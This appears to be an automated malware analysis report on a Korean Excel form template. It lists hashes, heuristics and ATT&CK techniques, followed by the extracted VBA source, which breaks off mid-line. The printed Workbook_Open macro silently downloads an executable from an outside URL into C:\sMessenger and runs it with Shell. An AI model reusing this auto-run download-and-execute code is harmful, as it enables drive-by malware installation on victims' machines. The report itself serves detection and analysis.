Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fb2517b4bb2ee6a5…

MALICIOUS

Office (OLE)

1.07 MB Created: 2008-06-05 06:01:16 Authoring application: Microsoft Excel First seen: 2019-11-20
MD5: 8153a4aed5a599160e80788de32d35b2 SHA-1: 7814df80c07628288623e57aa85163f5e0e659dd SHA-256: fb2517b4bb2ee6a539d0d0b20df38f8ebb0104a6518ce341e7782427f938d0fa
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The Workbook_Open macro in the VBA script executes a Shell command to download and run a second-stage executable from the URL http://www.yesform.com/active/searchMessenger/dw.php?mode=etc. This executable is saved to C:\sMessenger\searchMessenger_upgrade_x.exe. The macro also attempts to create the directory C:\sMessenger if it does not exist. The presence of the Shell() call and the download functionality strongly indicate a downloader or droppper malware.

Heuristics 6

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.yesform.com/active/searchMessenger/dw.php?mode=etc In document text (OLE body)
    • http://www.yesform.com/z_n/forms/search.php?q=In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10166 bytes
SHA-256: 40c06ee803d83c9f072d0c1085c78a1325cf7289ebaf22456eea5e76dfb0c92f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
    If Dir("C:\sMessenger\searchMessenger.exe") = "" Then
        File_DownLoad "http://www.yesform.com/active/searchMessenger/dw.php?mode=etc", "C:\sMessenger" & "\searchMessenger_upgrade_x.exe"
        Shell "C:\sMessenger\searchMessenger_upgrade_x.exe"
    End If
End Sub

Function File_DownLoad(ByVal SLocalFile As String, ByVal DLocalFile As String) As Boolean
    Dim oXMLHTTP As Object, DFile As Long, oResp() As Byte, FS As Object

    Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")
    Set FS = CreateObject("Scripting.FileSystemObject")
    oXMLHTTP.Open "GET", SLocalFile, False
    oXMLHTTP.send
    Do While oXMLHTTP.ReadyState <> 4
        DoEvents
    Loop

    oResp = oXMLHTTP.responsebody

    If FS.FolderExists("C:\sMessenger") = False Then MkDir "C:\sMessenger"

    DFile = FreeFile
    If Dir(DLocalFile) <> "" Then Kill DLocalFile

    Open DLocalFile For Binary As #DFile
    Put #DFile, , oResp
    Close #DFile

    Set oXMLHTTP = Nothing
    Set FS = Nothing
End Function


Attribute VB_Name = "Module1"
Public Const Banner As String = "국내최대 문서서식 예스폼 (www.yesform.com)"
Sub Move_Sheet1()
    Sheet1.Activate
End Sub
Sub Move_Sheet2()
    Sheet2.Activate
End Sub
Sub Move_Sheet4()
    Sheet4.Activate
End Sub
Sub Move_Sheet5()
    Sheet5.Activate
End Sub
Sub Move_Sheet6()
    Sheet6.Activate
End Sub

Sub 시트보호()
    Call Sheet_protect
    MsgBox "시트보호모드로 전환되었습니다.", vbInformation, Banner
End Sub

Sub 시트해제()
    Dim Result As Integer
    
    Result = MsgBox("본 컨텐츠는 시트보호모드에서 정상적으로 사용할 수 있도록 구성되었습니다." & Chr(13) & "보호 해제 후 임의 수정에 따라 발생하는 컨텐츠 오류 및 손상에 대하여 예스폼(Yesform)이 책임지지 않음을 알려드립니다." & Chr(13) & "시트보호모드를 해제하시겠습니까?", vbYesNo, Banner)

    If Result = vbYes Then
        Call Sheet_unprotect
    Else
        Exit Sub
    End If
End Sub

Sub P_preview()
    ActiveSheet.PrintPreview
End Sub

Sub P_out()
    ActiveSheet.PrintOut
End Sub

Sub Sheet_protect()
    ActiveSheet.Protect Password = 1234, DrawingObjects:=True, Contents:=True, Scenarios:=True _
        , AllowFormattingCells:=True, AllowFormattingColumns:=True, _
        AllowFormattingRows:=True, AllowInsertingHyperlinks:=True, AllowSorting:= _
        True, AllowFiltering:=True
End Sub

Sub Sheet_unprotect()
    ActiveSheet.Unprotect Password = 1234
End Sub

Sub RowCol()
    If ActiveSheet.CheckBoxes("Check Box 1").Value = 1 Then
        ActiveWindow.DisplayHeadings = True
    Else
        ActiveWindow.DisplayHeadings = False
    End If
End Sub
Sub Approval_3()
    Dim RngA(6) As Range
    Dim Combo As DropDown
    
    Set RngA(1) = ActiveSheet.[b4] '시작
    Set RngA(2) = ActiveSheet.[aj5] '끝
    Set RngA(3) = ActiveSheet.[ag4] '1칸 시작
    Set RngA(4) = ActiveSheet.[ac4] '2간 시작
    Set RngA(5) = ActiveSheet.[y4] '3칸 시작
    Set RngA(6) = ActiveSheet.[u4] '4칸 시작
    
    Application.ScreenUpdating = False
    Application.DisplayAlerts = False '경고문구 무시
    Call Sheet_unprotect
    Range(RngA(1), RngA(2)).MergeCells = False
    With Range(RngA(6), RngA(2))
        .HorizontalAlignment = xlCenter
        .VerticalAlignment = xlCenter
        .Font.Bold = True
        .Font.Size = 9
        .Font.Name = "굴림체"
    End With
    
    Set Combo = ActiveSheet.DropDowns(1)
    Application.ScreenUpdating = False
    Select Case Combo.ListIndex
        Case 1 '결재란 없음
            Range(RngA(1), RngA(2)).MergeCells = True
        Case 2 '결재란 한개
            Range(RngA(1), RngA(3).Offset(1, -1)).MergeCells = True '앞에 병합(결재란 앞)
            Range(RngA(3), RngA(3).Offset(0, 3)).MergeCells = True '첫번째 결재란 위 병합
            Range(RngA(3).Offset(1), RngA(2)).MergeCells = True '첫번째 결재란 아래 병합
        Case 3 '결재란 두개
            Range(RngA(1)
... (truncated)